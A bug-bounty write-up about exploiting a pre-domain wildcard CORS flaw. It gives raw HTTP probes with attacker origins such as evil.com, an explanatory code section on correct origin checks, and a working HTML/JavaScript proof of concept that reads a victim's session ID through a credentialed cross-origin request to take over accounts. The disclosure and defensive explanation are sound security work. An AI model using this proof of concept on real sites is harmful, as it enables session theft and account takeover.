Pre-domain wildcard CORS Exploitation

Arbaz Hussain
Aug 26, 2017 · 3 min read


Severity: High

Complexity: Medium

Weakness: Trusting a Pre-domain Wildcard as Origin


  • Some websites make classic URL parsing mistakes when attempting to verify whether an origin should be trusted.

For example, a site which I'll call advisor.com trusts all origins that end in advisor.com, including definitelynotadvisor.com.

  • The following are the test cases tried for finding the pre-domain wildcard weakness:

I am calling it REDACTED.COM since it is a private program on HackerOne.


Test 1 request:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com

Test 1 response:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://redacted.com
Access-Control-Max-Age: 3600

Test 2 request:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evil.com

Test 2 response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 3 request:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://redacted.com.evil.com

Test 3 response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 4 request:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://connect.redacted.com.evil.com

Test 4 response:
HTTP/1.1 302 Found
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Aug 2017 20:00:08 GMT
Location: https://connect.redacted.com/auth

Test 5 request:
GET /account HTTP/1.1
Host: connect.redacted.com
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: redacted.com
Accept-Language: en-US,en;q=0.8
Cookie:
Origin: https://evilredacted.com

Test 5 response:
Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: Accept, Accept-Encoding, Accept-Language, Authorization, X-Context, X-Session-ID
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
Access-Control-Allow-Origin: https://evilredacted.com
Access-Control-Max-Age: 3600

  • From Test 5 it is clear that the application is only verifying the Origin by checking whether it ends with redacted.com.
  • Access-Control-Allow-Headers (ACAH) and several methods are also enabled, which means an attacker can make different requests on behalf of the victim.
  • To successfully exploit this we need a *redacted.com domain.
  • So I went and bought kiraakredacted.com to exploit it.
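The suffix check inferred from Test 5, and the advisor.com example earlier, both come down to comparing the raw Origin string against a domain suffix. The following is an added example, not code from the original post or from the affected program: it places that weak check beside two correct ones (an exact allow-list match and a sub-domain match that enforces the dot boundary), builds the response headers a server should emit for each outcome, and runs all three checks over the five Origin values from Tests 1 to 5. The host names are the post's redacted placeholders; the allow-list, the domain constant and all function names are assumptions made for the example.

```javascript
// Added example, not code from the original post. It contrasts the suffix
// check inferred from Test 5 with two correct origin checks and runs them
// over the five Origin values the post tried. Host names are the post's
// placeholders; the allow-list and function names are assumptions.

// Assumed allow-list of exact origins the application means to trust.
const TRUSTED_ORIGINS = new Set([
  "https://redacted.com",
  "https://connect.redacted.com",
]);

// Registered domain whose sub-domains may be trusted (assumed).
const TRUSTED_DOMAIN = "redacted.com";

// Weak check (the "before" behaviour): a bare string suffix test on the raw
// header, so "https://evilredacted.com" passes just like "https://redacted.com".
function weakOriginCheck(origin) {
  return typeof origin === "string" && origin.endsWith(TRUSTED_DOMAIN);
}

// Parse an Origin header value into a URL, accepting only a plain
// https://host[:port] with no path, query, fragment or userinfo.
// Returns null when the value should be ignored.
function parseOrigin(origin) {
  if (typeof origin !== "string") return null;
  let url;
  try {
    url = new URL(origin);
  } catch (e) {
    return null; // not a syntactically valid origin
  }
  if (url.protocol !== "https:") return null;
  if (url.pathname !== "/" || url.search || url.hash || url.username || url.password) return null;
  return url;
}

// Strict check: exact match of the normalised origin against the allow-list.
function strictOriginCheck(origin) {
  const url = parseOrigin(origin);
  return url !== null && TRUSTED_ORIGINS.has(url.origin);
}

// Sub-domain check: when a wildcard is really needed, accept the registered
// domain itself or a host that ends in ".redacted.com". The leading dot is
// what stops "evilredacted.com" and "redacted.com.evil.com" from matching.
function subdomainOriginCheck(origin) {
  const url = parseOrigin(origin);
  if (url === null) return false;
  const host = url.hostname;
  return host === TRUSTED_DOMAIN || host.endsWith("." + TRUSTED_DOMAIN);
}

// CORS response headers for a request Origin under a given check. On a miss
// no Access-Control-Allow-Origin is sent at all; on a hit the exact origin is
// echoed together with Vary: Origin so shared caches keep replies per origin.
function corsHeadersFor(origin, check) {
  if (!check(origin)) return {};
  return {
    "Access-Control-Allow-Origin": origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}

// The five Origin values from Tests 1 to 5 in the post.
const PROBE_ORIGINS = [
  "https://redacted.com",
  "https://evil.com",
  "https://redacted.com.evil.com",
  "https://connect.redacted.com.evil.com",
  "https://evilredacted.com",
];

// Run every check over every probe; returns { origin: { weak, strict, subdomain } }.
function evaluateProbes() {
  const table = {};
  for (const origin of PROBE_ORIGINS) {
    table[origin] = {
      weak: weakOriginCheck(origin),
      strict: strictOriginCheck(origin),
      subdomain: subdomainOriginCheck(origin),
    };
  }
  return table;
}

console.table(evaluateProbes());
```

Run with Node and the table reproduces the post's findings: only the weak check accepts https://evilredacted.com, and both correct checks reject Tests 2 to 5 while still accepting Test 1. The design point is that the Origin header is parsed as a URL and compared on its normalised origin (or its hostname on a dot boundary), never as a raw string suffix; and that a miss produces no Access-Control-Allow-Origin header rather than a reflected one.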

  • Exploitation:

Now it's time to find a good exploitation endpoint to demonstrate and increase the impact. There was not much on connect.redacted.com to exploit; it was just a static site asking you to install their browser extension.

But one thing that kept my mindset on finding an exploitation path was that to install that extension you need to be logged in. I suspected they were storing some information somewhere. So I started bruteforcing and reading docs for API endpoints, and came across one which contains the user details along with the SESSIONID in the JSON response.

<html>
<body>
<button type='button' onclick='cors()'>xxx</button>
<p id='demo'></p>
<p id='session'></p>
<script>
// PoC page served from the attacker-controlled *redacted.com origin: it sends a
// credentialed cross-origin request and, because the permissive CORS policy
// reflects that origin with Allow-Credentials, the page can read the reply.
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = this.responseText;
      // Parse the JSON body into an object so its field values can be collected.
      var parsed = JSON.parse(this.responseText);
      var arr = [];
      for (var x in parsed) {
        arr.push(parsed[x]);
      }
      console.log(arr);
      // Index 13 is where the session id sat among this response's fields.
      document.getElementById('session').innerHTML = arr[13];
    }
  };
  xhttp.open("GET", "https://connect.redacted.com/v1/user", true);
  xhttp.withCredentials = true; // send the victim's cookies with the request
  xhttp.send();
}
</script>
</body>
</html>
Response (screenshot not reproduced)
  • Able to take over user accounts remotely.


Arbaz Hussain

Written by

~Kiraak-Boy~

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. In a nutshell, we are the largest InfoSec publication on Medium. Maintained by Hackrew
